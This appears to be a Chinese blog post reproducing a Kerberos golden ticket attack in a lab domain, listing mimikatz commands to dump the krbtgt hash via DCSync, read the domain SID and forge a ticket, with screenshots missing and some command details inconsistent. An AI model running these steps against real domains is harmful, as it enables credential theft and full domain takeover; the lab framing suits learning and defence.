黄金票据的复现

实验环境以及工具

服务器:Windows server 2003

用户:Windows 7旗舰版

工具:mimikatz

搭建服务器环境

参考:内网横向——域渗透之黄金票据复现-CSDN博客

创建用户

使用gpupdate刷新策略;

搭建win7环境

设置ip

 

 

 

 

 

 

 

 

 

 黄金票攻击复现

 这里直接在域控制权上进行操作
whoami /user    获取域的sid值(去掉最后的-500,500表示为administrator用户)
net config workstation  查看所处域

 

 

获取域的KRBTGT账户NTLM密码哈希或者aes-256值

用mimikatz

lsadump::dcsync /domain:aabb.com /user:krbtgt /csv

 

客户端打开mimikatz,首先清除之前的票据,依次输入指令

kerberos::purge

kerberos::list

dir \\aabb-bca237.aabb.com\c$


进行黄金票据的制作。指令格式为:

kerberos::golden /user:普通域用户 /domain:域 /sid:域的SID /krbtgt:krbtgt的NTLM_Hash /ticket:名字.kirbi

则生成黄金票据的指令为:

kerberos:golden /user:zhaoerhe /domain:ytdd.com /sid:S-1-5-21-1206714925-2034148990-4264453829 /krbtgt: /ticket:aabb.kirbi

参考:

3. mimikatz

kerberos::golden

mimikatz的kerberos::golden模块可以用于制作黄金票据,票据格式是.kirbi

首先获取krbtgt的hash

image-20191012175213102

获取域的sid

image-20191104153401060

制作黄金票据

相关推荐

  1. TextCNN

    2024-04-03 20:24:03       57 阅读
  2. github项目基本步骤

    2024-04-03 20:24:03       49 阅读
  3. 论文conda环境

    2024-04-03 20:24:03       31 阅读
  4. 】DiffTalk

    2024-04-03 20:24:03       60 阅读

最近更新

  1. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-04-03 20:24:03       94 阅读
  2. Could not load dynamic library ‘cudart64_100.dll‘

    2024-04-03 20:24:03       100 阅读
  3. 在Django里面运行非项目文件

    2024-04-03 20:24:03       82 阅读
  4. Python语言-面向对象

    2024-04-03 20:24:03       91 阅读

热门阅读

  1. Qt控件样式设置其一(常见方法及优缺点)

    2024-04-03 20:24:03       34 阅读
  2. Neo4j基础知识

    2024-04-03 20:24:03       39 阅读
  3. Spring中最常用的11个扩展点

    2024-04-03 20:24:03       32 阅读
  4. ctf.show_web11

    2024-04-03 20:24:03       38 阅读
  5. C++ //练习 11.11 不使用decltype重新定义bookstore。

    2024-04-03 20:24:03       37 阅读
  6. 串匹配【C++ 实现】

    2024-04-03 20:24:03       40 阅读
  7. Linux的Shell基础知识总结

    2024-04-03 20:24:03       35 阅读
  8. redis简介

    2024-04-03 20:24:03       38 阅读
  9. Vue-------自定义指令

    2024-04-03 20:24:03       37 阅读
  10. git diff

    2024-04-03 20:24:03       37 阅读
  11. linux ldd依赖拷贝

    2024-04-03 20:24:03       40 阅读
  12. LeetCode 36

    2024-04-03 20:24:03       35 阅读
  13. U3D开发中Json管理器的常用思路

    2024-04-03 20:24:03       36 阅读
  14. MySQL面试题系列-2

    2024-04-03 20:24:03       36 阅读
  15. Mysql中的那些索引

    2024-04-03 20:24:03       40 阅读
  16. c++ 死锁检测与内存泄露

    2024-04-03 20:24:03       28 阅读